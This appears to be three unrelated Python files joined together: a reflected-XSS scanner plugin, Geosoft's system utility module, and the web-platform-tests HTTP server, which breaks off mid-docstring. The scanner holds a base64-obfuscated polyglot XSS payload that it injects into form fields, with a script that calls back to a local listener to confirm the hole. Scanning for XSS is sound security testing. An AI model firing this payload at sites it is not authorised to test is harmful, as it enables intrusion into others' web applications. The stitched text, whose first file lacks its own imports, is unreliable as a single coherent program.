from selenium import webdriver
from browsermobproxy import Server
xss_payload = [
'amFWYXNDcmlwdDovKi0vKmAvKlxgLyonLyoiLyoqLygvKiAqL29OY2xpQ2s9',
'ICkvLyUwRCUwQSUwZCUwYS8vPC9zdFlsZS88L3RpdExlLzwvdGVYdGFyRWEvPC9zY1JpcHQvLS0hPlx4M2NzVmcvPHNWZy9vTmxvQWQ9',
'Ly8+XHgzZQ=='
]
script_template = "window.location.href='http://127.0.0.1:{}?uuid={}&name={}&url='+window.location.href"
class ReflectedXSSDetector:
def __init__(self, results, reports, **kwargs):
self.results = results
self.reports = reports
self.args = kwargs
self.listen_port = 9760
self.lock = threading.Lock()
self.vulnerable = []
self.server = None
self.cookies = {}
for entry in self.args['cookie'].split(';'):
if entry.find('=') == -1:
continue
key, value = entry.strip().split('=', 1)
self.cookies[key] = value
# Create proxy server
logging.info('Starting browsermobproxy server...')
self.proxy_server = Server(self.args['browsermobproxy'])
self.proxy_server.start()
self.proxy = self.proxy_server.create_proxy()
logging.info('Browsermobproxy server started')
# Create Chrome engine
logging.info('Creating Selenium Chrome webdriver...')
self.chrome_options = webdriver.ChromeOptions()
self.chrome_options.add_argument('--proxy-server={}'.format(self.proxy.proxy))
if 'headless' in self.args:
self.chrome_options.add_argument('--headless')
self.chrome_options.add_argument('--disable-gpu')
self.chrome_options.add_argument("--disable-extensions")
self.driver = webdriver.Chrome(chrome_options=self.chrome_options)
logging.info('Selenium Chrome webdriver created')
@staticmethod
def meta():
return {
'name': 'Reflected XSS Detector for all',
'version': '1.0'
}
def start_server(self):
class Handler(BaseHTTPRequestHandler):
def do_GET(s):
query = parse_qs(urlparse(s.path).query)
if 'uuid' in query and 'name' in query:
self.lock.acquire()
try:
pair = (query['uuid'][0], query['name'][0], query['url'][0])
if pair not in self.vulnerable:
self.vulnerable.append(pair)
finally:
self.lock.release()
s.send_response(200)
s.send_header('Content-Type', 'text/html')
s.end_headers()
s.wfile.write(b'')
def start_server():
logging.info('Starting monitor server at port {}...'.format(self.listen_port))
self.server.serve_forever()
self.server = HTTPServer(('127.0.0.1', self.listen_port), Handler)
t = threading.Thread(target=start_server, daemon=True)
t.start()
time.sleep(3)
def proceed(self):
for uuid in self.results['requests']:
logging.info('Testing payload for form {}'.format(uuid))
request = self.results['requests'][uuid]
if request['content-type'] == 'text/plain' or request['method'] != 'GET':
logging.warning('Skipped form {} due to its "text/plain" Content-Type or "POST" method'.format(uuid))
continue
params = {}
for name in request['fields']:
field = request['fields'][name]
if field['type'] in ['text', 'password', 'textarea']:
script = script_template.format(self.listen_port, uuid, name)
params[name] = \
base64.b64decode(xss_payload[0]).decode('utf-8') + script + \
base64.b64decode(xss_payload[1]).decode('utf-8') + script + \
base64.b64decode(xss_payload[2]).decode('utf-8')
elif field['type'] == 'radio':
params[name] = field['values'][0]
elif field['type'] == 'checkbox':
params[name] = field['value']
else:
params[name] = field['default']
url = request['url'] + '?' + urlencode(params)
self.driver.get(url)
for key in self.cookies:
exist = self.driver.get_cookie(key)
if exist is not None and exist['value'] != self.cookies[key]:
self.driver.add_cookie({
'name': key,
'value': self.cookies[key]
})
self.driver.get(url)
def stop_server(self):
self.server.shutdown()
logging.info('The monitoring server has been closed')
def make_report(self):
def make_entry(v):
request = self.results['requests'][v[0]]
return [request['location'], request['url'], request['method'], v[1], html.escape(v[2])]
self.reports.append({
'title': 'Reflected XSS Injection Points',
'overview': 'Found {} Reflected XSS injection point(s)'.format(len(self.vulnerable)),
'header': ['Form Location', 'Target', 'Method', 'Name', 'XSS Location'],
'entries': list(map(make_entry, self.vulnerable))
})
def exec(self):
logging.info('Start to test reflected XSS points')
if 'requests' not in self.results:
logging.fatal('There\'s no requests in results')
raise NoRequestsException
self.start_server()
self.proceed()
self.stop_server()
self.make_report()
logging.info('Stopping proxy server and Chrome webdriver...')
self.proxy.close()
self.proxy_server.stop()
self.driver.stop_client()
self.driver.close()
logging.info('Proxy server and Chrome webdriver have been closed')
|
system.py | """
Geosoft system functions.
.. note::
Regression tests provide usage examples: `Tests <https://github.com/GeosoftInc/gxpy/blob/master/geosoft/gxpy/tests/test_system.py>`_
"""
import time
import inspect
import os
import gc
import shutil
import zipfile
import threading
import sys
from itertools import count
import geosoft
__version__ = geosoft.__version__
def translate(s):
""" Translate string to user language."""
return s
def _t(s):
return translate(s)
def _logit(fn, *args, **kw):
"""function console printing decorator"""
def logger(*args, **kw):
ret = fn(*args, **kw)
print('{} called with args({}), kwargs({}); returns({})'.format(fn.__name__, args, kw, ret))
return ret
return logger
def app_name():
"""
Returns application script name.
.. versionadded:: 9.1
"""
return os.path.normpath(sys.argv[0])
def func_name(stack=0):
"""
Returns function name.
:param stack: depth into the calling stack, 0 (default) is this function, 1 is parent, etc.
:returns: function name, None if too deep into the stack
.. versionchanged:: 9.2 added stack
.. versionadded:: 9.1
"""
try:
func = inspect.stack()[stack+1][3]
return func
except:
return None
def call_location(stack=0):
"""
Returns function call location including file and line number as a string
:param stack: depth into the calling stack, 0 (default) is this function, 1 is parent, etc.
:returns: string formatted as '<file>, line XX in <function>', empty string if too deep into the stack
.. versionadded:: 9.2
"""
try:
stack_location = inspect.stack()[stack+1]
file, line, func = stack_location[1:4]
return '{}, line {} in function {}.'.format(file, line, func)
except:
return ''
def _parallel_foreach(f, l, threads=3, return_=False):
"""
Apply f to each element of l, in parallel, called by parallel_map().
From: http://wiki.scipy.org/Cookbook/Multithreading
"""
if threads > 1:
iteratorlock = threading.Lock()
exceptions = []
if return_:
n = 0
d = {}
i = zip(count(), l.__iter__())
else:
i = l.__iter__()
def runall():
while True:
iteratorlock.acquire()
try:
try:
if exceptions:
return
v = next(i)
finally:
iteratorlock.release()
except StopIteration:
return
try:
if return_:
n, x = v
d[n] = f(x)
else:
f(v)
except:
e = sys.exc_info()
iteratorlock.acquire()
try:
exceptions.append(e)
finally:
iteratorlock.release()
threadlist = [threading.Thread(target=runall) for j in range(threads)]
for t in threadlist:
t.start()
for t in threadlist:
t.join()
if exceptions:
a, b, c = exceptions[0]
raise (a, b, c)
if return_:
r = sorted(d.items())
return [v for (n, v) in r]
else:
if return_:
return [f(v) for v in l]
else:
for v in l:
f(v)
return
def parallel_map(f, l, threads=None):
"""
A parallel equivalent of the map() built-in Python function (it supports only one iterable argument though).
:param f: function to run in parallel f(). Must be thread-safe, of course.
:param l: iterable list of arguments to pass to each thread. Use tuples for multiple arguments.
:param threads: number of threads to use, default is number of cores on computer
:returns: list of results from each call to f(), in order of iterable l.
:example:
.. code::
import gxpy.system as gsys
def func(ab):
'''
:param ab: tuple (a,b)
:returns: a+b
'''
return ab[0] + ab[1]
# create list of 20 argument sets to calculate in parallel
data = [(1+i, 2+i) for i in range(20)]
# print results of running function in parallel
print(gsys.parallel_map(func, data))
# prints: [3, 5, 7, 9, 11, 13, 15, 17, 19, 21, 23, 25, 27, 29, 31, 33, 35, 37, 39, 41]
# same thing using a lambda function
print(gsys.parallel_map(lambda ab: ab[0] + ab[1], data))
.. versionadded:: 9.1
"""
if threads is None:
threads = os.cpu_count()
return _parallel_foreach(f, l, threads=threads, return_=True)
#############
# classes
class GXSysException(geosoft.GXRuntimeError):
"""
Exceptions from :mod:`geosoft.gxpy.system`.
.. versionadded:: 9.1
"""
pass
def wait_on_file(fileName, wait=100, retries=10):
"""
Working with large files on systems that cache the file can cause a situation
where the file is not yet completely written out before an attempt is made to open
a file that has just been closed.
Call this function to wait for the file to be available. Best to do this right after
you know that you may have written out a large file, or in a try/except around a file
open.
:param fileName:
:wait: time in milliseconds to wait between retries
:retries: maximum number of retries
:raises: GX_SysException if fail to get read access to the file.
.. versionadded:: 9.1
"""
tries = 0
while True:
if os.access(fileName, os.W_OK):
return
if tries >= retries:
raise GXSysException(_t('Unable to access {}').format(fileName))
tries += 1
time.sleep(wait / 1000.0)
def _unzip(zip_file_name, folder):
with zipfile.ZipFile(zip_file_name) as zf:
zf.extractall(folder)
files = zf.namelist()
return files
def unzip(zip_file_name, folder=None, report=None, checkready=25):
"""
Decompress and write the content of a zip file to a folder.
:param zip_file_name: zip file name, must have extension
:param folder: folder to write results, create it it does not exist
:param report: ignored
:param checkready: time in 1/10 second to check completion of each file, default 25
:returns: (folder that contains unzipped files, list of files)
.. versionadded:: 9.1
"""
# get full path
zip_file_name = os.path.abspath(zip_file_name)
# if no folder, determine based on zip file name
if folder is None:
folder = os.path.splitext(zip_file_name)[0]
# create a folder
if not os.path.exists(folder):
os.makedirs(folder)
files = None
try:
files = _unzip(zip_file_name, folder)
except:
raise GXSysException(_t('Cannot process zip file {}').format(zip_file_name))
finally:
# check that files are ready for access
if files and checkready > 0:
for n in files:
wait_on_file(os.path.join(folder, n), wait=100, retries=int(checkready * 100))
return folder, files
def remove_dir(directory, wait=200, tries=10):
"""
Robust directory removal, with timed retries to allow for OS timing lags. If you need to use this
you may have a coding error in which you are not properly releasing a resource.
:param directory: directory name, must be a directory
:param wait: wait between retries in milliseconds
:param tries: number of times to retry
.. versionadded:: 9.1
"""
if os.path.isdir(directory):
t = 0
while True:
try:
shutil.rmtree(directory)
return
except:
t += 1
if t >= tries:
raise
time.sleep(wait / 1000.0)
|
server.py | import errno
import http.server
import os
import socket
from socketserver import ThreadingMixIn
import ssl
import sys
import threading
import time
import traceback
import uuid
from collections import OrderedDict
from queue import Empty, Queue
from h2.config import H2Configuration
from h2.connection import H2Connection
from h2.events import RequestReceived, ConnectionTerminated, DataReceived, StreamReset, StreamEnded
from h2.exceptions import StreamClosedError, ProtocolError
from h2.settings import SettingCodes
from h2.utilities import extract_method_header
from urllib.parse import urlsplit, urlunsplit
from mod_pywebsocket import dispatch
from mod_pywebsocket.handshake import HandshakeException, AbortedByUserException
from . import routes as default_routes
from .config import ConfigBuilder
from .logger import get_logger
from .request import Server, Request, H2Request
from .response import Response, H2Response
from .router import Router
from .utils import HTTPException, isomorphic_decode, isomorphic_encode
from .constants import h2_headers
from .ws_h2_handshake import WsH2Handshaker
# We need to stress test that browsers can send/receive many headers (there is
# no specified limit), but the Python stdlib has an arbitrary limit of 100
# headers. Hitting the limit leads to HTTP 431, so we monkey patch it higher.
# https://bugs.python.org/issue26586
# https://github.com/web-platform-tests/wpt/pull/24451
import http.client
assert isinstance(getattr(http.client, '_MAXHEADERS'), int)
setattr(http.client, '_MAXHEADERS', 512)
"""
HTTP server designed for testing purposes.
The server is designed to provide flexibility in the way that
requests are handled, and to provide control both of exactly
what bytes are put on the wire for the response, and in the
timing of sending those bytes.
The server is based on the stdlib HTTPServer, but with some
notable differences in the way that requests are processed.
Overall processing is handled by a WebTestRequestHandler,
which is a subclass of BaseHTTPRequestHandler. This is responsible
for parsing the incoming request. A RequestRewriter is then
applied and may change the request data if it matches a
supplied rule.
Once the request data had been finalised, Request and Response
objects are constructed. These are used by the other parts of the
system to read information about the request and manipulate the
response.
Each request is handled by a particular handler function. The
mapping between Request and the appropriate handler is determined
by a Router. By default handlers are installed to interpret files
under the document root with .py extensions as executable python
files (see handlers.py for the api for such files), .asis files as
bytestreams to be sent literally and all other files to be served
statically.
The handler functions are responsible for either populating the
fields of the response object, which will then be written when the
handler returns, or for directly writing to the output stream.
"""
class RequestRewriter(object):
def __init__(self, rules):
"""Object for rewriting the request path.
:param rules: Initial rules to add; a list of three item tuples
(method, input_path, output_path), defined as for
register()
"""
self.rules = {}
for rule in reversed(rules):
self.register(*rule)
self.logger = get_logger()
def register(self, methods, input_path, output_path):
"""Register a rewrite rule.
:param methods: Set of methods this should match. "*" is a
special value indicating that all methods should
be matched.
:param input_path: Path to match for the initial request.
:param output_path: Path to replace the input path with in
the request.
"""
if isinstance(methods, (bytes, str)):
methods = [methods]
self.rules[input_path] = (methods, output_path)
def rewrite(self, request_handler):
"""Rewrite the path in a BaseHTTPRequestHandler instance, if
it matches a rule.
:param request_handler: BaseHTTPRequestHandler for which to
rewrite the request.
"""
split_url = urlsplit(request_handler.path)
if split_url.path in self.rules:
methods, destination = self.rules[split_url.path]
if "*" in methods or request_handler.command in methods:
self.logger.debug("Rewriting request path %s to %s" %
(request_handler.path, destination))
new_url = list(split_url)
new_url[2] = destination
new_url = urlunsplit(new_url)
request_handler.path = new_url
class WebTestServer(ThreadingMixIn, http.server.HTTPServer):
allow_reuse_address = True
acceptable_errors = (errno.EPIPE, errno.ECONNABORTED)
request_queue_size = 2000
# Ensure that we don't hang on shutdown waiting for requests
daemon_threads = True
def __init__(self, server_address, request_handler_cls,
router, rewriter, bind_address, ws_doc_root=None,
config=None, use_ssl=False, key_file=None, certificate=None,
encrypt_after_connect=False, latency=None, http2=False, **kwargs):
"""Server for HTTP(s) Requests
:param server_address: tuple of (server_name, port)
:param request_handler_cls: BaseHTTPRequestHandler-like class to use for
handling requests.
:param router: Router instance to use for matching requests to handler
functions
:param rewriter: RequestRewriter-like instance to use for preprocessing
requests before they are routed
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param use_ssl: Boolean indicating whether the server should use SSL
:param key_file: Path to key file to use if SSL is enabled.
:param certificate: Path to certificate to use if SSL is enabled.
:param ws_doc_root: Document root for websockets
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param bind_address True to bind the server to both the IP address and
port specified in the server_address parameter.
False to bind the server only to the port in the
server_address parameter, but not to the address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
"""
self.router = router
self.rewriter = rewriter
self.scheme = "http2" if http2 else "https" if use_ssl else "http"
self.logger = get_logger()
self.latency = latency
if bind_address:
hostname_port = server_address
else:
hostname_port = ("",server_address[1])
http.server.HTTPServer.__init__(self, hostname_port, request_handler_cls, **kwargs)
if config is not None:
Server.config = config
else:
self.logger.debug("Using default configuration")
with ConfigBuilder(browser_host=server_address[0],
ports={"http": [self.server_address[1]]}) as config:
assert config["ssl_config"] is None
Server.config = config
self.ws_doc_root = ws_doc_root
self.key_file = key_file
self.certificate = certificate
self.encrypt_after_connect = use_ssl and encrypt_after_connect
if use_ssl and not encrypt_after_connect:
if http2:
ssl_context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
ssl_context.load_cert_chain(keyfile=self.key_file, certfile=self.certificate)
ssl_context.set_alpn_protocols(['h2'])
self.socket = ssl_context.wrap_socket(self.socket,
server_side=True)
else:
self.socket = ssl.wrap_socket(self.socket,
keyfile=self.key_file,
certfile=self.certificate,
server_side=True)
def handle_error(self, request, client_address):
error = sys.exc_info()[1]
if ((isinstance(error, socket.error) and
isinstance(error.args, tuple) and
error.args[0] in self.acceptable_errors) or
(isinstance(error, IOError) and
error.errno in self.acceptable_errors)):
pass # remote hang up before the result is sent
else:
self.logger.error(traceback.format_exc())
class BaseWebTestRequestHandler(http.server.BaseHTTPRequestHandler):
"""RequestHandler for WebTestHttpd"""
def __init__(self, *args, **kwargs):
self.logger = get_logger()
http.server.BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
def finish_handling_h1(self, request_line_is_valid):
self.server.rewriter.rewrite(self)
request = Request(self)
response = Response(self, request)
if request.method == "CONNECT":
self.handle_connect(response)
return
if not request_line_is_valid:
response.set_error(414)
response.write()
return
self.logger.debug("%s %s" % (request.method, request.request_path))
handler = self.server.router.get_handler(request)
self.finish_handling(request, response, handler)
def finish_handling(self, request, response, handler):
# If the handler we used for the request had a non-default base path
# set update the doc_root of the request to reflect this
if hasattr(handler, "base_path") and handler.base_path:
request.doc_root = handler.base_path
if hasattr(handler, "url_base") and handler.url_base != "/":
request.url_base = handler.url_base
if self.server.latency is not None:
if callable(self.server.latency):
latency = self.server.latency()
else:
latency = self.server.latency
self.logger.warning("Latency enabled. Sleeping %i ms" % latency)
time.sleep(latency / 1000.)
if handler is None:
self.logger.debug("No Handler found!")
response.set_error(404)
else:
try:
handler(request, response)
except HTTPException as e:
response.set_error(e.code, e.message)
except Exception as e:
self.respond_with_error(response, e)
self.logger.debug("%i %s %s (%s) %i" % (response.status[0],
request.method,
request.request_path,
request.headers.get('Referer'),
request.raw_input.length))
if not response.writer.content_written:
response.write()
# If a python handler has been used, the old ones won't send a END_STR data frame, so this
# allows for backwards compatibility by accounting for these handlers that don't close streams
if isinstance(response, H2Response) and not response.writer.stream_ended:
response.writer.end_stream()
# If we want to remove this in the future, a solution is needed for
# scripts that produce a non-string iterable of content, since these
# can't set a Content-Length header. A notable example of this kind of
# problem is with the trickle pipe i.e. foo.js?pipe=trickle(d1)
if response.close_connection:
self.close_connection = True
if not self.close_connection:
# Ensure that the whole request has been read from the socket
request.raw_input.read()
def handle_connect(self, response):
self.logger.debug("Got CONNECT")
response.status = 200
response.write()
if self.server.encrypt_after_connect:
self.logger.debug("Enabling SSL for connection")
self.request = ssl.wrap_socket(self.connection,
keyfile=self.server.key_file,
certfile=self.server.certificate,
server_side=True)
self.setup()
return
def respond_with_error(self, response, e):
message = str(e)
if message:
err = [message]
else:
err = []
err.append(traceback.format_exc())
response.set_error(500, "\n".join(err))
class Http2WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/2.0"
def handle_one_request(self):
"""
This is the main HTTP/2.0 Handler.
When a browser opens a connection to the server
on the HTTP/2.0 port, the server enters this which will initiate the h2 connection
and keep running throughout the duration of the interaction, and will read/write directly
from the socket.
Because there can be multiple H2 connections active at the same
time, a UUID is created for each so that it is easier to tell them apart in the logs.
"""
config = H2Configuration(client_side=False)
self.conn = H2ConnectionGuard(H2Connection(config=config))
self.close_connection = False
# Generate a UUID to make it easier to distinguish different H2 connection debug messages
self.uid = str(uuid.uuid4())[:8]
self.logger.debug('(%s) Initiating h2 Connection' % self.uid)
with self.conn as connection:
# Bootstrapping WebSockets with HTTP/2 specification requires
# ENABLE_CONNECT_PROTOCOL to be set in order to enable WebSocket
# over HTTP/2
new_settings = dict(connection.local_settings)
new_settings[SettingCodes.ENABLE_CONNECT_PROTOCOL] = 1
connection.local_settings.update(new_settings)
connection.local_settings.acknowledge()
connection.initiate_connection()
data = connection.data_to_send()
window_size = connection.remote_settings.initial_window_size
self.request.sendall(data)
# Dict of { stream_id: (thread, queue) }
stream_queues = {}
try:
while not self.close_connection:
data = self.request.recv(window_size)
if data == '':
self.logger.debug('(%s) Socket Closed' % self.uid)
self.close_connection = True
continue
with self.conn as connection:
frames = connection.receive_data(data)
window_size = connection.remote_settings.initial_window_size
self.logger.debug('(%s) Frames Received: ' % self.uid + str(frames))
for frame in frames:
if isinstance(frame, ConnectionTerminated):
self.logger.debug('(%s) Connection terminated by remote peer ' % self.uid)
self.close_connection = True
# Flood all the streams with connection terminated, this will cause them to stop
for stream_id, (thread, queue) in stream_queues.items():
queue.put(frame)
elif hasattr(frame, 'stream_id'):
if frame.stream_id not in stream_queues:
queue = Queue()
stream_queues[frame.stream_id] = (self.start_stream_thread(frame, queue), queue)
stream_queues[frame.stream_id][1].put(frame)
if isinstance(frame, StreamEnded) or (hasattr(frame, "stream_ended") and frame.stream_ended):
del stream_queues[frame.stream_id]
except (socket.timeout, socket.error) as e:
self.logger.error('(%s) Closing Connection - \n%s' % (self.uid, str(e)))
if not self.close_connection:
self.close_connection = True
except Exception as e:
self.logger.error('(%s) Unexpected Error - \n%s' % (self.uid, str(e)))
finally:
for stream_id, (thread, queue) in stream_queues.items():
queue.put(None)
thread.join()
def _is_extended_connect_frame(self, frame):
if not isinstance(frame, RequestReceived):
return False
method = extract_method_header(frame.headers)
if method != b"CONNECT":
return False
protocol = ""
for key, value in frame.headers:
if key in (b':protocol', u':protocol'):
protocol = isomorphic_encode(value)
break
if protocol != b"websocket":
raise ProtocolError("Invalid protocol %s with CONNECT METHOD" % (protocol,))
return True
def start_stream_thread(self, frame, queue):
"""
This starts a new thread to handle frames for a specific stream.
:param frame: The first frame on the stream
:param queue: A queue object that the thread will use to check for new frames
:return: The thread object that has already been started
"""
if self._is_extended_connect_frame(frame):
target = Http2WebTestRequestHandler._stream_ws_thread
else:
target = Http2WebTestRequestHandler._stream_thread
t = threading.Thread(
target=target,
args=(self, frame.stream_id, queue)
)
t.start()
return t
def _stream_ws_thread(self, stream_id, queue):
frame = queue.get(True, None)
if frame is None:
return
rfile, wfile = os.pipe()
rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb', 0) # needs to be unbuffer for websockets
stream_handler = H2HandlerCopy(self, frame, rfile)
h2request = H2Request(stream_handler)
h2response = H2Response(stream_handler, h2request)
dispatcher = dispatch.Dispatcher(self.server.ws_doc_root, None, False)
if not dispatcher.get_handler_suite(stream_handler.path):
h2response.set_error(404)
h2response.write()
return
request_wrapper = _WebSocketRequest(stream_handler, h2response)
handshaker = WsH2Handshaker(request_wrapper, dispatcher)
try:
handshaker.do_handshake()
except HandshakeException as e:
self.logger.info('Handshake failed for error: %s' % e)
h2response.set_error(e.status)
h2response.write()
return
except AbortedByUserException:
h2response.write()
return
# h2 Handshaker prepares the headers but does not send them down the
# wire. Flush the headers here.
try:
h2response.write_status_headers()
except StreamClosedError:
# work around https://github.com/web-platform-tests/wpt/issues/27786
# The stream was already closed.
return
request_wrapper._dispatcher = dispatcher
# we need two threads:
# - one to handle the frame queue
# - one to handle the request (dispatcher.transfer_data is blocking)
# the alternative is to have only one (blocking) thread. That thread
# will call transfer_data. That would require a special case in
# handle_one_request, to bypass the queue and write data to wfile
# directly.
t = threading.Thread(
target=Http2WebTestRequestHandler._stream_ws_sub_thread,
args=(self, request_wrapper, stream_handler, queue)
)
t.start()
while not self.close_connection:
try:
frame = queue.get(True, 1)
except Empty:
continue
if isinstance(frame, DataReceived):
wfile.write(frame.data)
if frame.stream_ended:
raise NotImplementedError("frame.stream_ended")
wfile.close()
elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
break
t.join()
def _stream_ws_sub_thread(self, request, stream_handler, queue):
dispatcher = request._dispatcher
try:
dispatcher.transfer_data(request)
except StreamClosedError:
# work around https://github.com/web-platform-tests/wpt/issues/27786
# The stream was already closed.
queue.put(None)
return
stream_id = stream_handler.h2_stream_id
with stream_handler.conn as connection:
try:
connection.end_stream(stream_id)
data = connection.data_to_send()
stream_handler.request.sendall(data)
except StreamClosedError: # maybe the stream has already been closed
pass
queue.put(None)
def _stream_thread(self, stream_id, queue):
"""
This thread processes frames for a specific stream. It waits for frames to be placed
in the queue, and processes them. When it receives a request frame, it will start processing
immediately, even if there are data frames to follow. One of the reasons for this is that it
can detect invalid requests before needing to read the rest of the frames.
"""
# The file-like pipe object that will be used to share data to request object if data is received
wfile = None
request = None
response = None
req_handler = None
while not self.close_connection:
try:
frame = queue.get(True, 1)
except Empty:
# Restart to check for close_connection
continue
self.logger.debug('(%s - %s) %s' % (self.uid, stream_id, str(frame)))
if isinstance(frame, RequestReceived):
rfile, wfile = os.pipe()
rfile, wfile = os.fdopen(rfile, 'rb'), os.fdopen(wfile, 'wb')
stream_handler = H2HandlerCopy(self, frame, rfile)
stream_handler.server.rewriter.rewrite(stream_handler)
request = H2Request(stream_handler)
response = H2Response(stream_handler, request)
req_handler = stream_handler.server.router.get_handler(request)
if hasattr(req_handler, "frame_handler"):
# Convert this to a handler that will utilise H2 specific functionality, such as handling individual frames
req_handler = self.frame_handler(request, response, req_handler)
if hasattr(req_handler, 'handle_headers'):
req_handler.handle_headers(frame, request, response)
elif isinstance(frame, DataReceived):
wfile.write(frame.data)
if hasattr(req_handler, 'handle_data'):
req_handler.handle_data(frame, request, response)
if frame.stream_ended:
wfile.close()
elif frame is None or isinstance(frame, (StreamReset, StreamEnded, ConnectionTerminated)):
self.logger.debug('(%s - %s) Stream Reset, Thread Closing' % (self.uid, stream_id))
break
if request is not None:
request.frames.append(frame)
if hasattr(frame, "stream_ended") and frame.stream_ended:
try:
self.finish_handling(request, response, req_handler)
except StreamClosedError:
self.logger.debug('(%s - %s) Unable to write response; stream closed' %
(self.uid, stream_id))
break
def frame_handler(self, request, response, handler):
try:
return handler.frame_handler(request)
except HTTPException as e:
response.set_error(e.code, e.message)
response.write()
except Exception as e:
self.respond_with_error(response, e)
response.write()
class H2ConnectionGuard(object):
"""H2Connection objects are not threadsafe, so this keeps thread safety"""
lock = threading.Lock()
def __init__(self, obj):
assert isinstance(obj, H2Connection)
self.obj = obj
def __enter__(self):
self.lock.acquire()
return self.obj
def __exit__(self, exception_type, exception_value, traceback):
self.lock.release()
class H2Headers(dict):
def __init__(self, headers):
self.raw_headers = OrderedDict()
for key, val in headers:
key = isomorphic_decode(key)
val = isomorphic_decode(val)
self.raw_headers[key] = val
dict.__setitem__(self, self._convert_h2_header_to_h1(key), val)
def _convert_h2_header_to_h1(self, header_key):
if header_key[1:] in h2_headers and header_key[0] == ':':
return header_key[1:]
else:
return header_key
# TODO This does not seem relevant for H2 headers, so using a dummy function for now
def getallmatchingheaders(self, header):
return ['dummy function']
class H2HandlerCopy(object):
def __init__(self, handler, req_frame, rfile):
self.headers = H2Headers(req_frame.headers)
self.command = self.headers['method']
self.path = self.headers['path']
self.h2_stream_id = req_frame.stream_id
self.server = handler.server
self.protocol_version = handler.protocol_version
self.client_address = handler.client_address
self.raw_requestline = ''
self.rfile = rfile
self.request = handler.request
self.conn = handler.conn
class Http1WebTestRequestHandler(BaseWebTestRequestHandler):
protocol_version = "HTTP/1.1"
def handle_one_request(self):
response = None
try:
self.close_connection = False
request_line_is_valid = self.get_request_line()
if self.close_connection:
return
request_is_valid = self.parse_request()
if not request_is_valid:
#parse_request() actually sends its own error responses
return
self.finish_handling_h1(request_line_is_valid)
except socket.timeout as e:
self.log_error("Request timed out: %r", e)
self.close_connection = True
return
except Exception:
err = traceback.format_exc()
if response:
response.set_error(500, err)
response.write()
self.logger.error(err)
def get_request_line(self):
try:
self.raw_requestline = self.rfile.readline(65537)
except socket.error:
self.close_connection = True
return False
if len(self.raw_requestline) > 65536:
self.requestline = ''
self.request_version = ''
self.command = ''
return False
if not self.raw_requestline:
self.close_connection = True
return True
class WebTestHttpd(object):
"""
:param host: Host from which to serve (default: 127.0.0.1)
:param port: Port from which to serve (default: 8000)
:param server_cls: Class to use for the server (default depends on ssl vs non-ssl)
:param handler_cls: Class to use for the RequestHandler
:param use_ssl: Use a SSL server if no explicit server_cls is supplied
:param key_file: Path to key file to use if ssl is enabled
:param certificate: Path to certificate file to use if ssl is enabled
:param encrypt_after_connect: For each connection, don't start encryption
until a CONNECT message has been received.
This enables the server to act as a
self-proxy.
:param router_cls: Router class to use when matching URLs to handlers
:param doc_root: Document root for serving files
:param ws_doc_root: Document root for websockets
:param routes: List of routes with which to initialize the router
:param rewriter_cls: Class to use for request rewriter
:param rewrites: List of rewrites with which to initialize the rewriter_cls
:param config: Dictionary holding environment configuration settings for
handlers to read, or None to use the default values.
:param bind_address: Boolean indicating whether to bind server to IP address.
:param latency: Delay in ms to wait before serving each response, or
callable that returns a delay in ms
HTTP server designed for testing scenarios.
Takes a router class which provides one method get_handler which takes a Request
and returns a handler function.
.. attribute:: host
The host name or ip address of the server
.. attribute:: port
The port on which the server is running
.. attribute:: router
The Router object used to associate requests with resources for this server
.. attribute:: rewriter
The Rewriter object used for URL rewriting
.. attribute:: use_ssl
Boolean indicating whether the server is using ssl
.. attribute:: started
Boolean indicating whether the server is running
"""
def __init__(self, host="127.0.0.1", port=8000,
server_cls=None, handler_cls=Http1WebTestRequestHandler,
use_ssl=False, key_file=None, certificate=None, encrypt_after_connect=False,
router_cls=Router, doc_root=os.curdir, ws_doc_root=None, routes=None,
rewriter_cls=RequestRewriter, bind_address=True, rewrites=None,
latency=None, config=None, http2=False):
if routes is None:
routes = default_routes.routes
self.host = host
self.router = router_cls(doc_root, routes)
self.rewriter = rewriter_cls(rewrites if rewrites is not None else [])
self.use_ssl = use_ssl
self.http2 = http2
self.logger = get_logger()
if server_cls is None:
server_cls = WebTestServer
if use_ssl:
if not os.path.exists(key_file):
raise ValueError("SSL certificate not found: {}".format(key_file))
if not os.path.exists(certificate):
raise ValueError("SSL key not found: {}".format(certificate))
try:
self.httpd = server_cls((host, port),
handler_cls,
self.router,
self.rewriter,
config=config,
bind_address=bind_address,
ws_doc_root=ws_doc_root,
use_ssl=use_ssl,
key_file=key_file,
certificate=certificate,
encrypt_after_connect=encrypt_after_connect,
latency=latency,
http2=http2)
self.started = False
_host, self.port = self.httpd.socket.getsockname()
except Exception:
self.logger.critical("Failed to start HTTP server on port %s; "
"is something already using that port?" % port)
raise
def start(self, block=False):
"""Start the server.
:param block: True to run the server on the current thread, blocking,
False to run on a separate thread."""
http_type = "http2" if self.http2 else "https" if self.use_ssl else "http"
self.logger.info("Starting %s server on %s:%s" % (http_type, self.host, self.port))
self.started = True
if block:
self.httpd.serve_forever()
else:
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.setDaemon(True) # don't hang on exit
self.server_thread.start()
def stop(self):
"""
Stops the server.
If the server is not running, this method has no effect.
"""
if self.started:
try:
self.httpd.shutdown()
self.httpd.server_close()
self.server_thread.join()
self.server_thread = None
self.logger.info("Stopped http server on %s:%s" % (self.host, self.port))
except AttributeError:
pass
self.started = False
self.httpd = None
def get_url(self, path="/", query=None, fragment=None):
if not self.started:
return None
return urlunsplit(("http" if not self.use_ssl else "https",
"%s:%s" % (self.host, self.port),
path, query, fragment))
class _WebSocketConnection(object):
def __init__(self, request_handler, response):
"""Mimic mod_python mp_conn.
:param request_handler: A H2HandlerCopy instance.
:param response: A H2Response instance.
"""
self._request_handler = request_handler
self._response = response
self.remote_addr = self._request_handler.client_address
def write(self, data):
self._response.writer.write_data(data, False)
def read(self, length):
return self._request_handler.rfile.read(length)
class _WebSocketRequest(object):
def __init__(self, request_handler, response):
"""Mimic mod_python request.
